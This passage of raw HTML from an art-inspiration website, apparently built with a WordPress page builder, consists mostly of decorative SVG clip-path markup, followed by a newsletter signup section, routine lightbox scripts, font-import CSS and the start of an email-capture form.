ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.57475" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.5842499999999999" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.59375" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.60325" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.61275" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.62225" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.63175" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.64125" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.6507499999999999" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.66025" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.66975" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.67925" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.68875" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.69825" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.70775" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.7172499999999999" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.72675" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.73625" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.74575" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.75525" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.7647499999999999" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.77425" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.78375" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.79325" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.80275" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.81225" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.82175" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.8312499999999999" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.84075" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.85025" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.85975" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.86925" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.87875" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.88825" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.8977499999999999" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.90725" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.91675" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.92625" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.93575" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.9452499999999999" rx="0.76" ry="0.004750"></ellipse></clipPath><clipPath id="clip-mobile-mobile-bottom-5u9uc4t2rbz31" class="decoration-clip clip-path-mobile-mobile-bottom" clipPathUnits="objectBoundingBox" data-screen="mobile-" decoration-type="divider" pointer-width="5" pointer-height="5" style="zigzag" clip-path="url(#clip-mobile-mobile-left-5u9uc4t2rbz31)"><polygon points="0 0, 0 0.95, 0.76 0.95, 0.76 0.95, 0.766 1, 0.772 0.95, 0.778 1, 0.784 0.95, 0.79 1, 0.796 0.95, 0.802 1, 0.808 0.95, 0.8140000000000001 1, 0.8200000000000001 0.95, 0.8260000000000001 1, 0.8320000000000001 0.95, 0.838 1, 0.844 0.95, 0.85 1, 0.856 0.95, 0.862 1, 0.868 0.95, 0.874 1, 0.88 0.95, 0.886 1, 0.892 0.95, 0.898 1, 0.904 0.95, 0.91 1, 0.916 0.95, 0.922 1, 0.928 0.95, 0.934 1, 0.94 0.95, 0.946 1, 0.952 0.95, 0.958 1, 0.964 0.95, 0.97 1, 0.976 0.95, 0.982 1, 0.988 0.95, 0.994 1, 1 0.95, 1 0"></polygon></clipPath><clipPath id="clip-mobile-mobile-left-5u9uc4t2rbz31" class="decoration-clip clip-path-mobile-mobile-left" clipPathUnits="objectBoundingBox" data-screen="mobile-" pointer-width="1" pointer-height="76" style="curves" decoration-type="none" clip-path="url(#clip-mobile-right-5u9uc4t2rbz31)"><polygon points="0 0, 0 1, 1 1, 1 0"></polygon><ellipse cx="0.76" cy="0.00475" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.014249999999999999" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.02375" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.03325" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.042749999999999996" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.05225" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.06175" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.07125" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.08075" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.09025" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.09974999999999999" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.10925" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.11875" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.12825" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.13774999999999998" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.14725" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.15675" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.16625" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.17575" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.18525" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.19475" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.20425" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.21375" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.22325" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.23274999999999998" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.24225" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.25175" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.26125" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.27075" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.28025" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.28975" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.29925" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.30874999999999997" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.31825" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.32775" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.33725" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.34675" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.35625" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.36574999999999996" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.37525" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.38475" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.39425" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.40375" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.41325" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.42275" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.43224999999999997" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.44175" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.45125" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.46075" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.47025" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.47975" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.48924999999999996" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.49874999999999997" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.50825" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.5177499999999999" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.52725" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.53675" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.54625" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.55575" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.56525" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.57475" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.5842499999999999" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.59375" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.60325" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.61275" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.62225" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.63175" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.64125" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.6507499999999999" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.66025" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.66975" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.67925" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.68875" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.69825" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.70775" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.7172499999999999" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.72675" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.73625" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.74575" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.75525" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.7647499999999999" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.77425" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.78375" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.79325" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.80275" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.81225" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.82175" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.8312499999999999" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.84075" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.85025" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.85975" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.86925" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.87875" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.88825" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.8977499999999999" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.90725" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.91675" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.92625" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.93575" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.9452499999999999" rx="0.76" ry="0.004750"></ellipse></clipPath><clipPath id="clip-mobile-tablet-bottom-5u9uc4t2rbz31" class="decoration-clip clip-path-mobile-tablet-bottom" clipPathUnits="objectBoundingBox" data-screen="mobile-" decoration-type="none" pointer-width="5" pointer-height="5" style="zigzag" clip-path="url(#clip-mobile-tablet-left-5u9uc4t2rbz31)"><polygon points="0 0, 0 1, 1 1, 1 0"></polygon></clipPath><clipPath id="clip-mobile-tablet-left-5u9uc4t2rbz31" class="decoration-clip clip-path-mobile-tablet-left" clipPathUnits="objectBoundingBox" data-screen="mobile-" pointer-width="29" pointer-height="66" style="curves" decoration-type="none" clip-path="url(#clip-mobile-right-5u9uc4t2rbz31)"><polygon points="0 0, 0 1, 1 1, 1 0"></polygon><ellipse cx="0.66" cy="0.158333" rx="0.66" ry="0.158333"></ellipse><ellipse cx="0.66" cy="0.474999" rx="0.66" ry="0.158333"></ellipse><ellipse cx="0.66" cy="0.7916650000000001" rx="0.66" ry="0.158333"></ellipse></clipPath><clipPath id="clip-mobile-tablet-mobile-bottom-5u9uc4t2rbz31" class="decoration-clip clip-path-mobile-tablet-mobile-bottom" clipPathUnits="objectBoundingBox" data-screen="mobile-" decoration-type="divider" pointer-width="5" pointer-height="5" style="zigzag" clip-path="url(#clip-mobile-tablet-mobile-left-5u9uc4t2rbz31)"><polygon points="0 0, 0 0.95, 0.76 0.95, 0.76 0.95, 0.766 1, 0.772 0.95, 0.778 1, 0.784 0.95, 0.79 1, 0.796 0.95, 0.802 1, 0.808 0.95, 0.8140000000000001 1, 0.8200000000000001 0.95, 0.8260000000000001 1, 0.8320000000000001 0.95, 0.838 1, 0.844 0.95, 0.85 1, 0.856 0.95, 0.862 1, 0.868 0.95, 0.874 1, 0.88 0.95, 0.886 1, 0.892 0.95, 0.898 1, 0.904 0.95, 0.91 1, 0.916 0.95, 0.922 1, 0.928 0.95, 0.934 1, 0.94 0.95, 0.946 1, 0.952 0.95, 0.958 1, 0.964 0.95, 0.97 1, 0.976 0.95, 0.982 1, 0.988 0.95, 0.994 1, 1 0.95, 1 0"></polygon></clipPath><clipPath id="clip-mobile-tablet-mobile-left-5u9uc4t2rbz31" class="decoration-clip clip-path-mobile-tablet-mobile-left" clipPathUnits="objectBoundingBox" data-screen="mobile-" pointer-width="1" pointer-height="76" style="curves" decoration-type="none" clip-path="url(#clip-mobile-right-5u9uc4t2rbz31)"><polygon points="0 0, 0 1, 1 1, 1 0"></polygon><ellipse cx="0.76" cy="0.00475" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.014249999999999999" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.02375" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.03325" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.042749999999999996" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.05225" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.06175" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.07125" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.08075" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.09025" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.09974999999999999" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.10925" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.11875" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.12825" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.13774999999999998" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.14725" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.15675" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.16625" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.17575" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.18525" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.19475" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.20425" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.21375" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.22325" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.23274999999999998" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.24225" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.25175" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.26125" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.27075" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.28025" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.28975" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.29925" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.30874999999999997" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.31825" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.32775" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.33725" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.34675" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.35625" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.36574999999999996" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.37525" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.38475" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.39425" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.40375" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.41325" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.42275" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.43224999999999997" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.44175" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.45125" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.46075" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.47025" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.47975" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.48924999999999996" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.49874999999999997" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.50825" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.5177499999999999" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.52725" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.53675" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.54625" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.55575" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.56525" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.57475" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.5842499999999999" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.59375" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.60325" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.61275" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.62225" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.63175" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.64125" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.6507499999999999" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.66025" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.66975" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.67925" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.68875" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.69825" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.70775" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.7172499999999999" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.72675" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.73625" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.74575" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.75525" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.7647499999999999" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.77425" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.78375" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.79325" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.80275" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.81225" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.82175" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.8312499999999999" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.84075" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.85025" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.85975" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.86925" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.87875" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.88825" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.8977499999999999" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.90725" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.91675" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.92625" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.93575" rx="0.76" ry="0.004750"></ellipse><ellipse cx="0.76" cy="0.9452499999999999" rx="0.76" ry="0.004750"></ellipse></clipPath><clipPath id="clip-mobile-right-5u9uc4t2rbz31" class="decoration-clip clip-path-mobile-right" clipPathUnits="objectBoundingBox" data-screen="mobile-" pointer-width="6" pointer-height="75" style="zigzag" decoration-type="none"><polygon points="0 0, 0 1,0.25 1,0.25 0.95, 0.25 0.95, 1 0.922059, 0.25 0.894118, 1 0.866177, 0.25 0.838236, 1 0.810295, 0.25 0.782354, 1 0.754413, 0.25 0.726472, 1 0.698531, 0.25 0.67059, 1 0.642649, 0.25 0.614708, 1 0.586767, 0.25 0.558826, 1 0.530885, 0.25 0.5029440000000001, 1 0.47500299999999995, 0.25 0.44706199999999996, 1 0.41912099999999997, 0.25 0.39117999999999997, 1 0.363239, 0.25 0.335298, 1 0.307357, 0.25 0.2794159999999999, 1 0.2514749999999999, 0.25 0.2235339999999999, 1 0.1955929999999999, 0.25 0.1676519999999999, 1 0.13971099999999992, 0.25 0.11176999999999992, 1 0.08382899999999993, 0.25 0.05588799999999994, 1 0.027946999999999944, 0.25 0.000005999999999950489, 0.25 0, 0.25 0"></polygon></clipPath></defs></svg></div> <div class="tve-page-section-in tve_empty_dropzone" data-css="tve-u-45bbb537ba15d8"><div class="thrv_wrapper thrv-columns" data-css="tve-u-55bbb537ba15f1" style=""><div class="tcb-flex-row tcb-medium-no-wrap tcb-resized tcb--cols--2" data-css="tve-u-65bbb537ba15f3"><div class="tcb-flex-col" data-css="tve-u-75bbb537ba15f4" style=""><div class="tcb-col tve_empty_dropzone" data-css="tve-u-85bbb537ba15f6" style=""><div class="thrv_wrapper thrv_text_element tve_empty_dropzone" data-css="tve-u-95bbb537ba15f7"><h1 data-css="tve-u-105bbb537ba15f8" style="text-align: center;"><strong> </strong><span data-css="tve-u-115bbb537ba15f9">GET MY WEEKLY FREE NEWSLETTER WITH WEEKLY ART INSPIRATION</span></h1></div></div></div><div class="tcb-flex-col" data-css="tve-u-125bbb537ba15fb" style=""><div class="tcb-col tve_empty_dropzone" data-css="tve-u-135bbb537ba15fc" style=""><div class="thrv_wrapper thrv_icon tcb-icon-display" data-css="tve-u-145bbb537ba15fd"><svg class="tcb-icon" viewBox="0 0 448 512" data-id="icon-arrow-right-light" data-name="arrow-right"> <path d="M216.464 36.465l-7.071 7.07c-4.686 4.686-4.686 12.284 0 16.971L387.887 239H12c-6.627 0-12 5.373-12 12v10c0 6.627 5.373 12 12 12h375.887L209.393 451.494c-4.686 4.686-4.686 12.284 0 16.971l7.071 7.07c4.686 4.686 12.284 4.686 16.97 0l211.051-211.05c4.686-4.686 4.686-12.284 0-16.971L233.434 36.465c-4.686-4.687-12.284-4.687-16.97 0z"></path> </svg></div></div></div></div></div></div> </div></div></div></div></div></div></div><script type="text/javascript">var TVE_Event_Manager_Registered_Callbacks = TVE_Event_Manager_Registered_Callbacks || {};TVE_Event_Manager_Registered_Callbacks.thrive_leads_form_close = function(t, a, c){TL_Front.close_form(this, t, a, c); return false;};TVE_Event_Manager_Registered_Callbacks.thrive_lightbox = function(t,a,c){var $t=jQuery("#tve_thrive_lightbox_"+c.l_id).css("display", ""),a=c.l_anim?c.l_anim:"instant";TCB_Front.openLightbox($t,a);return false;};;</script><style type="text/css" class="tve_global_style"></style><style type="text/css" class="tve_custom_style">@import url("//fonts.googleapis.com/css?family=Karla:400,700&subset=latin");@import url("//fonts.googleapis.com/css?family=Roboto:400,700,500,&subset=latin");@media (min-width: 300px){[data-css="tve-u-1602ef9800a"] { padding-right: 20px !important; }[data-css="tve-u-1602ef7e1ba"] { margin-bottom: 20px !important; }#tve_editor [data-css="tve-u-1600c34021b"] input { border: none; background-color: rgb(241, 241, 241) !important; margin-bottom: 15px !important; }#tve_editor [data-css="tve-u-1600c340219"] input { border: none; font-family: Roboto; font-weight: 400; background-color: rgb(241, 241, 241) !important; margin-bottom: 15px !important; }[data-css="tve-u-1600c33bd13"] { padding-bottom: 0px !important; }#tve_editor [data-css="tve-u-1600c31f72c"]:hover button { background-image: linear-gradient(rgba(255, 255, 255, 0.2) 0%, rgba(0, 0, 0, 0) 100%) !important; background-size: auto !important; background-position: 0px 0px !important; background-attachment: scroll !important; background-repeat: no-repeat !important; }#tve_editor [data-css="tve-u-1600c31f72c"] button { border: none; font-family: Karla; font-weight: 400 !important; background-color: rgb(245, 212, 25) !important; background-image: linear-gradient(rgba(255, 255, 255, 0.3) 0%, rgba(0, 0, 0, 0) 100%) !important; background-size: auto !important; background-position: 0px 0px !important; background-attachment: scroll !important; background-repeat: no-repeat !important; font-size: 35px; }[data-css="tve-u-1600c30299d"] { line-height: 1.3em !important; }[data-css="tve-u-1600c2fe7a0"] h3 { margin: 0px !important; padding: 0px !important; }[data-css="tve-u-1600c2fe7a0"] h2 { margin: 0px !important; padding: 0px !important; }[data-css="tve-u-1600c2fe7a0"] h1 { margin: 0px !important; padding: 0px !important; }[data-css="tve-u-1600c2fe7a0"] p { margin: 0px !important; padding: 0px !important; }[data-css="tve-u-1600c2f618e"] { font-family: Roboto !important; font-weight: 400 !important; }[data-css="tve-u-1600c31f72c"] { margin-left: auto !important; margin-right: auto !important; float: none; }#tve_editor [data-css="tve-u-1600c31f72c"] strong { font-weight: 700; }}</style><div style="display: none" id="tve_thrive_lightbox_13891"><div class="tve_p_lb_overlay" data-style="" style=""></div><div class="tve_p_lb_content bSe cnt tcb-lp-lb" style=""><div class="tve_p_lb_inner" id="tve-p-scroller" style=""><article><div id="tve_flt" class="tve_flt"><div id="tve_editor" class="tve_shortcode_editor"><div class="thrv_wrapper thrv-page-section"> <div class="tve-page-section-out"></div> <div class="tve-page-section-in tve_empty_dropzone" data-css="tve-u-1600c2fe7a0"><div class="thrv_wrapper thrv_heading" data-tag="h1" style=""><h1 data-css="tve-u-1600c30299d" style="text-align: center;"><span data-css="tve-u-1600c2f618e" style="font-family: Roboto; font-weight: 400;">JOIN OUR WEEKLY NEWSLETTER FOR ART INSPIRATION</span></h1></div><div class="thrv_wrapper thrv-columns" data-css="tve-u-1602ef7e1ba"><div class="tcb-flex-row tcb--cols--1" data-css="tve-u-1600c33bd13"><div class="tcb-flex-col" data-css="tve-u-1600c31c03f" style=""><div class="tcb-col tve_empty_dropzone" data-css="tve-u-1602ef9800a"><div class="thrv_wrapper thrv_lead_generation" data-connection="api" style=""><input type="hidden" class="tve-lg-err-msg" value="{&quot;email&quot;:&quot;Email address invalid&quot;,&quot;phone&quot;:&quot;Phone number invalid&quot;,&quot;password&quot;:&quot;Password 